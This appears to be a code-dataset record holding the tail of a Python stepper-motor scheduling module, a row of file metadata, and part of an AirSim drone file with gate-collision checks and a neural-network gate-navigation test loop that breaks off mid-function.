        pause_list = StepperOperationUtils().to_list(pause_list)
        ### process the cube ID list
        cube_ID_list = StepperOperationUtils().process_cube_ID_list(cube_ID_list, connection_number)
        ### define run_number
        run_number = StepperOperationUtils().set_run_number(cube_ID_list, connection_number)
        ### validate pause list
        StepperOperationUtils().check_pause_list(pause_list)
        ### validate speed option
        StepperOperationUtils().check_speed_option(speed_option)
        ### validate step option
        StepperOperationUtils().check_step_option(step_option)
        ### validate sync option
        StepperOperationUtils().check_sync_option(sync)
        ### validate & normalize time option
        time_option = StepperOperationUtils().check_time_option(time_option)
        ### validate wait
        StepperOperationUtils().check_wait(wait, run_option="schedule")
        ### apply defaults
        StepperOperationUtils().set_default(input_list=[speed_list, step_list, time_list], option_list=[speed_option, step_option, time_option], run_option="schedule")
        ### branch on the time option
        ### no time option: schedule is driven by speed_list + step_list
        if time_option.lower() == "none":
            ### check that speed, step are lists of lists (dataframe/array support TBD)
            StepperOperationUtils().check_list_of_list(speed_list, mode_name="schedule", list_name="speed_list", run_option="schedule")
            StepperOperationUtils().check_list_of_list(step_list, mode_name="schedule", list_name="step_list", run_option="schedule")
            ### speed, step list length checks
            StepperOperationUtils().len_check(speed_list, cube_ID_list, connection_number, mode_name="schedule", list_name="speed_list", run_number=run_number, run_option="schedule")
            StepperOperationUtils().len_check(step_list, cube_ID_list, connection_number, mode_name="schedule", list_name="step_list", run_number=run_number, run_option="schedule")
            ### inner element length check
            StepperOperationUtils().len_check_elemental_list(speed_list, step_list, mode_name="schedule", input_list1_name="speed_list", input_list2_name="step_list")
            ### inner element length check for sync mode
            StepperOperationUtils().len_check_elemental_list_in_sync(sync, speed_list, step_list, mode_name="schedule sync", input_list1_name="speed_list", input_list2_name="step_list")
            ### clamp speed and step
            speed_list, sleep_list = StepperOperationUtils().limit_speed(speed_list, speed_option, run_number, sync, run_option="schedule")
            step_list, speed_list = StepperOperationUtils().limit_step(step_list, speed_list, sleep_list, step_option, run_number, sync, run_option="schedule")
        ### time option "speed": schedule is driven by time_list + speed_list
        elif time_option.lower() == "speed":
            ### check that time, speed are lists of lists (dataframe/array support TBD)
            StepperOperationUtils().check_list_of_list(time_list, mode_name="schedule", list_name="time_list", run_option="schedule")
            StepperOperationUtils().check_list_of_list(speed_list, mode_name="schedule", list_name="speed_list", run_option="schedule")
            ### time, speed list length checks
            StepperOperationUtils().len_check(time_list, cube_ID_list, connection_number, mode_name="schedule", list_name="time_list", run_number=run_number, run_option="schedule")
            StepperOperationUtils().len_check(speed_list, cube_ID_list, connection_number, mode_name="schedule", list_name="speed_list", run_number=run_number, run_option="schedule")
            ### inner element length check
            StepperOperationUtils().len_check_elemental_list(time_list, speed_list, mode_name="schedule", input_list1_name="time_list", input_list2_name="speed_list")
            ### inner element length check for sync mode
            StepperOperationUtils().len_check_elemental_list_in_sync(sync, time_list, speed_list, mode_name="schedule sync", input_list1_name="time_list", input_list2_name="speed_list")
            ### convert time and clamp speed and step
            speed_list, sleep_list = StepperOperationUtils().limit_speed(speed_list, speed_option, run_number, sync, run_option="schedule")
            step_list, _, speed_option, step_option = StepperOperationUtils().convert_time_list(time_list, speed_list, step_list=None, speed_option=speed_option, step_option=None, run_number=run_number, sync=sync, run_option="schedule", time_option="speed")
            step_list, speed_list = StepperOperationUtils().limit_step(step_list, speed_list, sleep_list, step_option="STEP", run_number=run_number, sync=sync, run_option="schedule")
        ### time option "step": schedule is driven by time_list + step_list
        elif time_option.lower() == "step":
            ### check that time, step are lists of lists (dataframe/array support TBD)
            StepperOperationUtils().check_list_of_list(time_list, mode_name="schedule", list_name="time_list", run_option="schedule")
            StepperOperationUtils().check_list_of_list(step_list, mode_name="schedule", list_name="step_list", run_option="schedule")
            ### time, step list length checks
            StepperOperationUtils().len_check(time_list, cube_ID_list, connection_number, mode_name="schedule", list_name="time_list", run_number=run_number, run_option="schedule")
            StepperOperationUtils().len_check(step_list, cube_ID_list, connection_number, mode_name="schedule", list_name="step_list", run_number=run_number, run_option="schedule")
            ### inner element length check
            StepperOperationUtils().len_check_elemental_list(time_list, step_list, mode_name="schedule", input_list1_name="time_list", input_list2_name="step_list")
            ### inner element length check for sync mode
            StepperOperationUtils().len_check_elemental_list_in_sync(sync, time_list, step_list, mode_name="schedule sync", input_list1_name="time_list", input_list2_name="step_list")
            ### convert time and clamp speed and step
            speed_list, step_list, speed_option, step_option = StepperOperationUtils().convert_time_list(time_list, speed_list=None, step_list=step_list, speed_option=None, step_option=step_option, run_number=run_number, sync=sync, run_option="schedule", time_option="step")
            speed_list, sleep_list = StepperOperationUtils().limit_speed(speed_list, speed_option, run_number, sync, run_option="schedule")
            step_list, speed_list = StepperOperationUtils().limit_step(step_list, speed_list, sleep_list, step_option="STEP", run_number=run_number, sync=sync, run_option="schedule")
        ### pause length check
        StepperOperationUtils().len_check(pause_list, cube_ID_list, connection_number, mode_name="schedule", list_name="pause_list", run_number=run_number, run_option="schedule")
        ### expand to byte form
        cube_ID_list, speed_list, step_list, pause_list = StepperOperationUtils().expand_bytes(cube_ID_list, connection_number, run_number, speed_list, step_list, pause_list)
        ### sync mode handling
        speed_list, step_list = StepperOperationUtils().check_time_sync_none(speed_list, step_list, sync, run_number, run_option="schedule")
        ### convert wait (if wait is "step" or "schedule", compute it for the current run_option)
        if isinstance(wait, str):
            ### fixed: previously passed run_option="step" (copied from the step-mode
            ### method), computing the wait for the wrong mode
            wait = StepperOperationUtils().convert_wait(speed_list, step_list, pause_list, run_option="schedule")
        ### operation (group_id handling still TODO)
        sending_bytes = b""
        for i, cube_ID_element in enumerate(cube_ID_list):
            ### register status
            self._robot_status[group_id].controller_status.stepper_mode[cube_ID_element] = "point"
            self._robot_status[group_id].controller_status.stepper_schedule_point_start[cube_ID_element] = [0]
            self._robot_status[group_id].controller_status.stepper_schedule_point_end[cube_ID_element] = [len(speed_list[i])-1]
            self._robot_status[group_id].controller_status.stepper_schedule_point_repeat[cube_ID_element] = [1]
            self._robot_status[group_id].controller_status.stepper_speed_schedule[cube_ID_element] = speed_list[i]
            self._robot_status[group_id].controller_status.stepper_step_schedule[cube_ID_element] = step_list[i]
            self._robot_status[group_id].controller_status.stepper_pause[cube_ID_element] = pause_list[i]
            self._robot_status[group_id].controller_status.stepper_schedule_sync_on[cube_ID_element] = sync
            ### append bytes
            sending_bytes += self._GenerateProtocolInstance.SetScheduledSteps_bytes(cube_ID_element, speed_list[i], step_list[i], group_id, True)
        if connection_number > 1:
            sending_bytes = self._GenerateProtocolInstance.SetAggregateSteps_bytes(group_id, sending_bytes)
        ### send the schedule setup
        self._write_copy(sending_bytes)
        ### hold until the aggregate-set acknowledgement arrives
        StepperOperationUtils().wait_until_agg_set(self._get_robot_status, self._set_robot_status, group_id, connection_number)
        ### play via points (whole schedule, once)
        time.sleep(0.2)
        sending_bytes = b""
        for i, cube_ID_element in enumerate(cube_ID_list):
            sending_bytes += self._GenerateProtocolInstance.SetScheduledPoints_bytes(cube_ID_element, [0], [len(speed_list[i])-1], [1], group_id, pause_list[i])
        if connection_number > 1:
            sending_bytes = self._GenerateProtocolInstance.SetAggregateSteps_bytes(group_id, sending_bytes)
        self._write_copy(sending_bytes)
        ### sleep
        if wait != 0:
            time.sleep(wait + 0.3)
        time.sleep(0.2)
    # set schedule
    def set_motor_schedule(self, cube_ID_list, speed_list, step_list, pause_list=True, time_list=None,
                           group_id=None, speed_option="RPM", step_option="CYCLE", sync=False, time_option=None,
                           wait=0) -> None:
        """Upload and run a schedule; thin wrapper around :meth:`run_motor_schedule`.

        Note the different ``pause_list`` default (True) compared to
        ``run_motor_schedule`` (False).
        """
        group_id = StepperOperationUtils.proc_group_id(self._GenerateProtocolInstance._group_id, group_id)
        self.run_motor_schedule(cube_ID_list, speed_list, step_list, pause_list, time_list, group_id, speed_option, step_option, sync, time_option, wait)
        return None
class ScheduledPointsStepperOperation(StepperOperationBase):
    """Stepper operation that plays (sections of) an already-uploaded schedule."""
    def __init__(self, number, group_id, robot_status, start_check, write):
        StepperOperationBase.__init__(self, number, group_id, robot_status, start_check, write)
    # play schedule
    def play_motor_schedule(self,
                            cube_ID_list="all",
                            repeat_list=None,
                            start_point_list=None,
                            stop_point_list=None,
                            start_and_stop_list=None,
                            pause_list=False,
                            group_id=None,
                            sync=False,
                            wait=0) -> None:
        """
        Play motors with set schedule.

        start/stop/repeat lists are lists of lists (one inner list per cube);
        a stop index of "end" is resolved to the last schedule index. A
        schedule must have been uploaded first (raises ValueError otherwise).
        """
        ### fixed: the previous [[1]]/[[None]] defaults were mutable and shared
        ### between calls — "end" resolution below mutates stop_point_list in place
        if repeat_list is None:
            repeat_list = [[1]]
        if start_point_list is None:
            start_point_list = [[None]]
        if stop_point_list is None:
            stop_point_list = [[None]]
        if start_and_stop_list is None:
            start_and_stop_list = [[None]]
        group_id = StepperOperationUtils.proc_group_id(self._GenerateProtocolInstance._group_id, group_id)
        ### number of connected cubes
        connection_number = self._robot_status[group_id].controller_status.connection_number
        ### start check
        self._start_check_copy()
        ### normalize start, stop, repeat, cube_ID, pause into lists
        start_point_list = StepperOperationUtils().to_list(start_point_list)
        stop_point_list = StepperOperationUtils().to_list(stop_point_list)
        repeat_list = StepperOperationUtils().to_list(repeat_list)
        cube_ID_list = StepperOperationUtils().to_list(cube_ID_list)
        pause_list = StepperOperationUtils().to_list(pause_list)
        start_and_stop_list = StepperOperationUtils().to_list(start_and_stop_list)
        ### process the cube ID list
        cube_ID_list = StepperOperationUtils().process_cube_ID_list(cube_ID_list, connection_number)
        ### define run_number
        run_number = StepperOperationUtils().set_run_number(cube_ID_list, connection_number)
        ### check that a schedule has been set
        for cube_ID_element in cube_ID_list:
            if self._robot_status[group_id].controller_status.stepper_speed_schedule[cube_ID_element] == []: # schedule is empty
                raise ValueError("Set schedule before play.")
        ### validate pause list
        StepperOperationUtils().check_pause_list(pause_list)
        ### validate sync option
        StepperOperationUtils().check_sync_option(sync)
        ### validate wait
        StepperOperationUtils().check_wait(wait, run_option="point")
        ### convert & apply defaults
        start_point_list, stop_point_list = StepperOperationUtils().set_default(input_list=[start_point_list, stop_point_list, start_and_stop_list], option_list=None, run_option="point")
        ### list-of-list checks
        StepperOperationUtils().check_list_of_list(start_point_list, mode_name="point", list_name="start_point_list", run_option="point")
        StepperOperationUtils().check_list_of_list(stop_point_list, mode_name="point", list_name="stop_point_list", run_option="point")
        StepperOperationUtils().check_list_of_list(repeat_list, mode_name="point", list_name="repeat_list", run_option="point")
        ### list length checks
        StepperOperationUtils().len_check(start_point_list, cube_ID_list, connection_number, mode_name="point", list_name="start_point_list", run_number=run_number, run_option="point")
        StepperOperationUtils().len_check(stop_point_list, cube_ID_list, connection_number, mode_name="point", list_name="stop_point_list", run_number=run_number, run_option="point")
        StepperOperationUtils().len_check(repeat_list, cube_ID_list, connection_number, mode_name="point", list_name="repeat_list", run_number=run_number, run_option="point")
        StepperOperationUtils().len_check(pause_list, cube_ID_list, connection_number, mode_name="point", list_name="pause_list", run_number=run_number, run_option="point")
        ### list expansion
        if cube_ID_list[0] == 0xFF:
            cube_ID_list = [i for i in range(connection_number)]
        if len(start_point_list) == 1: # if length is 1, expand to run_number entries
            start_point_list = StepperOperationUtils().list_product_copy(start_point_list, run_number)
        if len(stop_point_list) == 1: # if length is 1, expand to run_number entries
            stop_point_list = StepperOperationUtils().list_product_copy(stop_point_list, run_number)
        if len(repeat_list) == 1: # if length is 1, expand to run_number entries
            repeat_list = StepperOperationUtils().list_product_copy(repeat_list, run_number)
        if len(pause_list) == 1: # if length is 1, expand to run_number entries
            pause_list = pause_list*run_number
        ### element length checks
        for start_point_list_element, stop_point_list_element, repeat_list_element in zip(start_point_list, stop_point_list, repeat_list):
            if len(start_point_list_element) != len(stop_point_list_element) or len(start_point_list_element) != len(repeat_list_element):
                raise ValueError("Start list number, stop list, and repeat list number must be the same.")
        ### sync mode checks
        if sync:
            ### fixed: previously only the loop-leaked last cube_ID_element was
            ### checked; every cube must have been scheduled in sync mode
            for cube_ID_element in cube_ID_list:
                if not self._robot_status[group_id].controller_status.stepper_schedule_sync_on[cube_ID_element]:
                    raise ValueError("In sync mode, set schedule must be in sync mode.")
            for start_point_list_element, stop_point_list_element in zip(start_point_list, stop_point_list):
                ### fixed: the stop comparison previously read
                ### stop_point_list_element[0] (element vs its own first item)
                ### instead of stop_point_list[0]
                if start_point_list_element != start_point_list[0] or \
                    stop_point_list_element != stop_point_list[0]:
                    raise ValueError("In sync mode, each point schedule must be the same.")
        ### check point indices against the set schedule
        speed_length_list = list(map(len, self._robot_status[group_id].controller_status.stepper_speed_schedule))
        for i, cube_ID_element in enumerate(cube_ID_list):
            for j in range(len(start_point_list[i])):
                if isinstance(stop_point_list[i][j], str) and stop_point_list[i][j].lower() == "end":
                    stop_point_list[i][j] = speed_length_list[cube_ID_element]-1 # "end" resolves to the last index (stop is the final index)
                StepperOperationUtils().integer_check(start_point_list[i][j])
                StepperOperationUtils().integer_check(stop_point_list[i][j])
                StepperOperationUtils().integer_check(repeat_list[i][j])
                if start_point_list[i][j] < 0 or stop_point_list[i][j] < 0 \
                    or speed_length_list[cube_ID_element]-1 < start_point_list[i][j] \
                    or speed_length_list[cube_ID_element]-1 < stop_point_list[i][j]:
                    raise ValueError("Unavailable point index. Schedule does not have that index.")
                elif stop_point_list[i][j] < start_point_list[i][j]:
                    raise ValueError("Start index must be less than or equal to stop index.")
                if repeat_list[i][j] < 0 or 255 < repeat_list[i][j]:
                    raise ValueError("Unavailable number. Repeat must be positive, or smaller than 256.")
        ### wait handling
        if isinstance(wait, str):
            wait = StepperOperationUtils().convert_wait_point(cube_ID_list, self._robot_status, group_id, start_point_list, stop_point_list, repeat_list, pause_list)
        ### operation (group_id handling still TODO)
        sending_bytes = b""
        for i, cube_ID_element in enumerate(cube_ID_list):
            ### register status
            self._robot_status[group_id].controller_status.stepper_mode[cube_ID_element] = "point"
            self._robot_status[group_id].controller_status.stepper_pause[cube_ID_element] = pause_list[i]
            self._robot_status[group_id].controller_status.stepper_schedule_point_start[cube_ID_element] = start_point_list[i]
            self._robot_status[group_id].controller_status.stepper_schedule_point_end[cube_ID_element] = stop_point_list[i]
            self._robot_status[group_id].controller_status.stepper_schedule_point_repeat[cube_ID_element] = repeat_list[i]
            ### point setup
            sending_bytes += self._GenerateProtocolInstance.SetScheduledPoints_bytes(cube_ID_element, start_point_list[i], stop_point_list[i], repeat_list[i], group_id, pause_list[i])
        ### write bytes, run
        if connection_number > 1:
            sending_bytes = self._GenerateProtocolInstance.SetAggregateSteps_bytes(group_id, sending_bytes)
        self._write_copy(sending_bytes)
        ### sleep
        if wait != 0:
            time.sleep(wait + 0.3)
        time.sleep(0.2)
| 67.611973
| 274
| 0.699898
| 3,958
| 30,493
| 4.994694
| 0.055836
| 0.032172
| 0.033386
| 0.028226
| 0.903485
| 0.868683
| 0.844049
| 0.812029
| 0.778643
| 0.742172
| 0
| 0.003187
| 0.197422
| 30,493
| 451
| 275
| 67.611973
| 0.804601
| 0.068311
| 0
| 0.569579
| 1
| 0
| 0.058217
| 0.001999
| 0
| 0
| 0.000143
| 0
| 0
| 1
| 0.038835
| false
| 0
| 0.009709
| 0.003236
| 0.071197
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dbe91c329e7cff43a099efe93c0b119b59404f70
| 54,227
|
py
|
Python
|
datagen/img_generator/additional_funcs.py
|
MeRKeZ/DeepDrone_Airsim
|
15043ebf71b5b15e550843856aecfc4cd4fe192a
|
[
"MIT"
] | 2
|
2021-04-21T11:33:01.000Z
|
2021-08-06T07:17:06.000Z
|
datagen/img_generator/additional_funcs.py
|
MeRKeZ/DeepDrone_Airsim
|
15043ebf71b5b15e550843856aecfc4cd4fe192a
|
[
"MIT"
] | null | null | null |
datagen/img_generator/additional_funcs.py
|
MeRKeZ/DeepDrone_Airsim
|
15043ebf71b5b15e550843856aecfc4cd4fe192a
|
[
"MIT"
] | 2
|
2021-09-26T07:51:31.000Z
|
2021-09-26T08:54:55.000Z
|
def test_collision(self, gate_index=0):
    """Place the quad at gate edge points and exercise the collision check.

    Teleports the vehicle to the gate centre, then to the left/right
    (``gate_x_range``) and top/bottom (``gate_z_range``) edge points of the
    gate, calling ``check_collision`` at each pose.

    Fixes vs. original: the def was missing ``self`` although the body uses
    it throughout (test_algorithm invokes it as ``self.test_collision(...)``);
    ``psi`` used a bare undefined ``pi`` where the sibling lines use ``np.pi``.
    """
    # NOTE(review): gate_index is accepted for parity with the commented-out
    # caller in test_algorithm, but only gate 0 is used here — TODO confirm.
    phi = - np.pi/9
    theta = np.pi/8
    psi = np.pi/2  # fixed: was bare `pi`, undefined in this module
    print("\nDrone Pos x={0:.3}, y={1:.3}, z={2:.3}".format(self.track[0].position.x_val, self.track[0].position.y_val, self.track[0].position.z_val))
    quad_pose = [self.track[0].position.x_val, self.track[0].position.y_val, self.track[0].position.z_val, -phi, -theta, psi]
    self.client.simSetVehiclePose(QuadPose(quad_pose), True)
    time.sleep(1)
    self.check_collision()
    # gate orientation as a 3x3 rotation matrix
    rot_matrix = Rotation.from_quat([self.track[0].orientation.x_val, self.track[0].orientation.y_val,
                                     self.track[0].orientation.z_val, self.track[0].orientation.w_val]).as_dcm().reshape(3,3)
    gate_x_range = [0.5, -0.75]
    gate_z_range = [0.5, -0.75]
    edge_ind = 0
    #print("\nGate Ind: {0}, Gate x={1:.3}, y={2:.3}, z={3:.3}".format(i+1, self.track[i].position.x_val, self.track[i].position.y_val, self.track[i].position.z_val))
    gate_pos = np.array([self.track[0].position.x_val, self.track[0].position.y_val, self.track[0].position.z_val])
    gate_edge_list = []
    # left/right edges of the gate (offsets along the gate's local x axis)
    for x_rng in gate_x_range:
        gate_edge_range = np.array([x_rng, 0., 0.])
        gate_edge_world = np.dot(rot_matrix, gate_edge_range.reshape(-1,1)).ravel()
        gate_edge_point = np.array([gate_pos[0]+gate_edge_world[0], gate_pos[1]+gate_edge_world[1], gate_pos[2]+gate_edge_world[2]])
        print("\nDrone Pos x={0:.3}, y={1:.3}, z={2:.3}".format(gate_edge_point[0], gate_edge_point[1], gate_edge_point[2]))
        self.quad.state = [gate_edge_point[0], gate_edge_point[1], gate_edge_point[2], phi, theta, psi, 0., 0., 0., 0., 0., 0.]
        quad_pose = [gate_edge_point[0], gate_edge_point[1], gate_edge_point[2], -phi, -theta, psi]
        self.client.simSetVehiclePose(QuadPose(quad_pose), True)
        self.check_collision()
        time.sleep(5)
    # top/bottom edges of the gate (offsets along the gate's local z axis)
    for z_rng in gate_z_range:
        gate_edge_range = np.array([0., 0., z_rng])
        gate_edge_world = np.dot(rot_matrix, gate_edge_range.reshape(-1,1)).ravel()
        gate_edge_point = np.array([gate_pos[0]+gate_edge_world[0], gate_pos[1]+gate_edge_world[1], gate_pos[2]+gate_edge_world[2]])
        edge_ind += 1
        print("\nDrone Pos x={0:.3}, y={1:.3}, z={2:.3}".format(gate_edge_point[0], gate_edge_point[1], gate_edge_point[2]))
        self.quad.state = [gate_edge_point[0], gate_edge_point[1], gate_edge_point[2], phi, theta, psi, 0., 0., 0., 0., 0., 0.]
        quad_pose = [gate_edge_point[0], gate_edge_point[1], gate_edge_point[2], -phi, -theta, psi]
        self.client.simSetVehiclePose(QuadPose(quad_pose), True)
        self.check_collision()
        time.sleep(5)
def check_collision(self, max_distance = 0.15):
    """Return True if the drone's centre or any body corner touches a gate line.

    Each entry of ``self.line_list`` is a pair of 3D edge endpoints. For the
    axes where the two endpoints (nearly) coincide, the drone must lie within
    ``max_distance``; along the remaining axis it must lie between the two
    endpoints. The centre is tested first, then the 8 rotated body corners.

    Fix vs. original: ``drone_z_range`` was commented out but still used in
    the corner loop below, raising NameError on every call.
    """
    drone_x_range = [.1, -.1]
    drone_y_range = [.1, -.1]
    drone_z_range = [.05, -.05]  # fixed: was commented out but used below
    # body orientation from the quad's Euler angles (yaw, pitch, roll)
    rot_matrix = R.from_euler('ZYX',[self.quad.state[5], self.quad.state[4], self.quad.state[3]],degrees=False).as_dcm()
    drone_pos = np.array([self.quad.state[0], self.quad.state[1], self.quad.state[2]])
    edge_ind = 0
    eps = 0.1  # tolerance for deciding which axes of a line are "constant"
    # first: test the drone centre against every gate line
    for i, line in enumerate(self.line_list):
        edge_i, edge_j = line[0], line[1]
        same_point_ind = abs(edge_i - edge_j) <= eps
        diff_point_ind = abs(edge_i - edge_j) > eps
        edge_upper_limit = edge_i[same_point_ind] + max_distance
        edge_lower_limit = edge_i[same_point_ind] - max_distance
        on_same_line_cond = (edge_lower_limit < drone_pos[same_point_ind]) & (drone_pos[same_point_ind] < edge_upper_limit)
        if np.all(on_same_line_cond):
            if (edge_i[diff_point_ind] <= drone_pos[diff_point_ind] <= edge_j[diff_point_ind]) or \
               (edge_j[diff_point_ind] <= drone_pos[diff_point_ind] <= edge_i[diff_point_ind]):
                print("Collision detected!")
                print("Ind: {0}, Drone center x={1:.3}, y={2:.3}, z={3:.3}".format(i, drone_pos[0], drone_pos[1], drone_pos[2]))
                return True
    # second: test every rotated corner of the drone body
    for x_rng in drone_x_range:
        for y_rng in drone_y_range:
            for z_rng in drone_z_range:
                drone_range = np.array([x_rng, y_rng, z_rng])
                drone_range_world = np.dot(rot_matrix, drone_range.reshape(-1,1)).ravel()
                drone_edge_point = np.array([drone_pos[0]+drone_range_world[0], drone_pos[1]+drone_range_world[1], drone_pos[2]+drone_range_world[2]])
                edge_ind += 1
                for i, line in enumerate(self.line_list):
                    edge_i, edge_j = line[0], line[1]
                    same_point_ind = abs(edge_i - edge_j) <= eps
                    diff_point_ind = abs(edge_i - edge_j) > eps
                    edge_upper_limit = edge_i[same_point_ind] + max_distance
                    edge_lower_limit = edge_i[same_point_ind] - max_distance
                    on_same_line_cond = (edge_lower_limit < drone_edge_point[same_point_ind]) & (drone_edge_point[same_point_ind] < edge_upper_limit)
                    if np.all(on_same_line_cond):
                        if (edge_i[diff_point_ind] <= drone_edge_point[diff_point_ind] <= edge_j[diff_point_ind]) or \
                           (edge_j[diff_point_ind] <= drone_edge_point[diff_point_ind] <= edge_i[diff_point_ind]):
                            print("Collision detected!")
                            print("Ind: {0}, Corner x={1:.3}, y={2:.3}, z={3:.3}".format(edge_ind, drone_edge_point[0], drone_edge_point[1], drone_edge_point[2]))
                            return True
    return False
def isThereAnyGate(self, img_rgb):
    """Return True if any pixel of img_rgb falls inside the gate colour range.

    Fix vs. original: three explanatory lines were missing their ``#``
    comment markers, making the function a SyntaxError.
    """
    # colour boundaries for the gate (per-channel lower/upper)
    lower, upper = [100, 17, 15], [200, 50, 56]
    # create NumPy arrays from the boundaries
    lower = np.array(lower, dtype = "uint8")
    upper = np.array(upper, dtype = "uint8")
    # find the colors within the specified boundaries and apply the mask
    mask = cv2.inRange(img_rgb, lower, upper)
    output = cv2.bitwise_and(img_rgb, img_rgb, mask = mask)
    if output.any():
        #print("there is a gate on the frame!")
        return True
    return False
def test_algorithm(self, method = "MAX", use_model = False):
pose_prediction = np.zeros((1000,4),dtype=np.float32)
prediction_std = np.zeros((4,1),dtype=np.float32)
labels_dict = {0:3, 1:4, 2:5, 3:10, 4:-1}
gate_target = self.track[0]
gate_psi = Rotation.from_quat([gate_target.orientation.x_val, gate_target.orientation.y_val, gate_target.orientation.z_val, gate_target.orientation.w_val]).as_euler('ZYX',degrees=False)[0]
psi_start = gate_psi - np.pi/2 #drone kapi karsisinde olacak sekilde durmali
#if drone is at initial point
quad_pose = [self.drone_init.position.x_val, self.drone_init.position.y_val, self.drone_init.position.z_val, 0., 0., psi_start]
self.state0 = [self.drone_init.position.x_val, self.drone_init.position.y_val, self.drone_init.position.z_val, 0., 0., psi_start, 0., 0., 0., 0., 0., 0.]
self.client.simSetVehiclePose(QuadPose(quad_pose), True)
self.quad = Quadrotor(self.state0)
self.curr_idx = 0
self.test_states[method].append(self.quad.state)
self.xd_ddot_pr = 0.
self.yd_ddot_pr = 0.
self.xd_dddot_pr = 0.
self.yd_dddot_pr = 0.
self.psid_pr = 0.
self.psid_dot_pr = 0.
track_completed = False
fail_check = False
collision_check = False
init_start = True
final_target = [self.track[-1].position.x_val, self.track[-1].position.y_val, self.track[-1].position.z_val]
# To check collision algorithm, comment it out
# for i in range(100):
# gate_index = np.random.randint(0,5)
# self.test_collision(gate_index)
if self.flight_log:
f=open(self.log_path, "a")
while((not track_completed) and (not fail_check)):
image_response = self.client.simGetImages([airsim.ImageRequest('0', airsim.ImageType.Scene, False, False)])[0]
#if len(image_response.image_data_uint8) == image_response.width * image_response.height * 3:
img1d = np.fromstring(image_response.image_data_uint8, dtype=np.uint8) # get numpy array
img_rgb = img1d.reshape(image_response.height, image_response.width, 3) # reshape array to 4 channel image array H X W X 3
img_rgb = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2RGB)
anyGate = self.isThereAnyGate(img_rgb)
#cv2.imwrite(os.path.join(self.base_path, 'images', "frame" + str(self.curr_idx).zfill(len(str(self.num_samples))) + '.png'), img_rgb)
img = Image.fromarray(img_rgb)
image = self.transformation(img)
quad_pose = [self.quad.state[0], self.quad.state[1], self.quad.state[2], -self.quad.state[3], -self.quad.state[4], self.quad.state[5]]
with torch.no_grad():
# Determine Gat location with Neural Networks
pose_gate_body = self.Dronet(image)
if self.curr_idx % 6 == 0:
noise_coeff = np.random.uniform(-1,1)
elif self.curr_idx % 3 == 0:
noise_coeff = 0.
pose_gate_body[0][0] += (noise_coeff*pose_gate_body[0][0])
pose_gate_body = np.asarray(pose_gate_body.reshape(-1,1).to('cpu')).reshape(-1,1)
pose_prediction[self.curr_idx] = pose_gate_body.ravel()
# for i,num in enumerate(pose_gate_body.reshape(-1,1)):
# #print(num, i , self.curr_idx)
# pose_prediction[self.curr_idx][i] = num.item()
# if self.curr_idx % 12 == 0:
# self.brightness = random.uniform(30.,40.)
# self.contrast = random.uniform(30.,40.)
# self.saturation = random.uniform(30.,40.)
# self.transformation = transforms.Compose([
# transforms.Resize([200, 200]),
# #transforms.Lambda(self.gaussian_blur),
# transforms.ColorJitter(brightness=self.brightness, contrast=self.contrast, saturation=self.saturation),
# transforms.ToTensor()])
# elif self.curr_idx % 6 == 0:
# self.brightness = random.uniform(0.,1.)
# self.contrast = random.uniform(0.,1.)
# self.saturation = random.uniform(0.,1.)
# self.transformation = transforms.Compose([
# transforms.Resize([200, 200]),
# #transforms.Lambda(self.gaussian_blur),
# transforms.ColorJitter(brightness=self.brightness, contrast=self.contrast, saturation=self.saturation),
# transforms.ToTensor()])
if self.curr_idx >= 11:
pose_gate_cov = self.lstmR(torch.from_numpy(pose_prediction[self.curr_idx-11:self.curr_idx+1].reshape(1,12,4)).to(self.device))
for i, p_g_c in enumerate(pose_gate_cov.reshape(-1,1)):
prediction_std[i] = p_g_c.item()
# Gate ground truth values will be implemented
pose_gate_body = pose_gate_body.reshape(-1,1)
prediction_std = np.clip(prediction_std, 0, prediction_std)
prediction_std = prediction_std.ravel()
covariance_sum = np.sum(prediction_std)
# Trajectory generate
waypoint_world = spherical_to_cartesian(self.quad.state, pose_gate_body)
pos0 = [self.quad.state[0], self.quad.state[1], self.quad.state[2]]
vel0 = [self.quad.state[6], self.quad.state[7], self.quad.state[8]]
acc0 = [0.,0.,0.]
posf = [waypoint_world[0], waypoint_world[1], waypoint_world[2]]
accf = [0.,0.,0.]
yaw0 = self.quad.state[5]
yaw_diff = pose_gate_body[3][0]
yawf = (self.quad.state[5]+yaw_diff) + np.pi/2
#yawf = Rotation.from_quat([self.track[self.current_gate].orientation.x_val, self.track[self.current_gate].orientation.y_val,
# self.track[self.current_gate].orientation.z_val, self.track[self.current_gate].orientation.w_val]).as_euler('ZYX',degrees=False)[0] - np.pi/2
print "\nCurrent index: {0}".format(self.curr_idx)
print "Predicted r: {0:.3}, Variance r: {1:.3}".format(pose_gate_body[0][0], prediction_std[0])
print "Gate Predicted, x: {0:.3}, y: {1:.3}, z: {2:.3}, psi: {3:.3} deg".format(waypoint_world[0], waypoint_world[1], waypoint_world[2], yawf*180/np.pi)
print "Brightness: {0:.3}, Contast: {1:.3}, Saturation: {2:.3}".format(self.brightness, self.contrast, self.saturation)
#print "Variance values, r: {0:.3}, phi: {1:.3}, theta: {2:.3}, psi: {3:.3}".format(prediction_std[0], prediction_std[1], prediction_std[2], prediction_std[3])
if self.flight_log:
f.write("\nCurrent index: {0}".format(self.curr_idx))
f.write("\nPredicted r: {0:.3}, Variance r: {1:.3}".format(pose_gate_body[0][0], prediction_std[0]))
f.write("\nGate Predicted, x: {0:.3}, y: {1:.3}, z: {2:.3}, psi: {3:.3} deg".format(waypoint_world[0], waypoint_world[1], waypoint_world[2], yawf*180/np.pi))
f.write("\nBrightness: {0:.3}, Contast: {1:.3}, Saturation: {2:.3}".format(self.brightness, self.contrast, self.saturation))
#f.write("\nVariance values, r: {0:.3}, phi: {1:.3}, theta: {2:.3}, psi: {3:.3}".format(prediction_std[0], prediction_std[1], prediction_std[2], prediction_std[3]))
#f.write("\nBlur coefficient: {0:.3}/{1:.3}. Variance sum: {2:.3}".format(self.blur_coeff, self.blur_range, covariance_sum))
min_jerk_check = False
if use_model:
#true_init_x, true_init_y, true_init_z, blur_coeff, var_sum, diff_x, diff_y, diff_z, diff_phi, diff_theta, diff_psi, r_std, phi_std, theta_std, psi_std, Tf, MP_Method, Cost
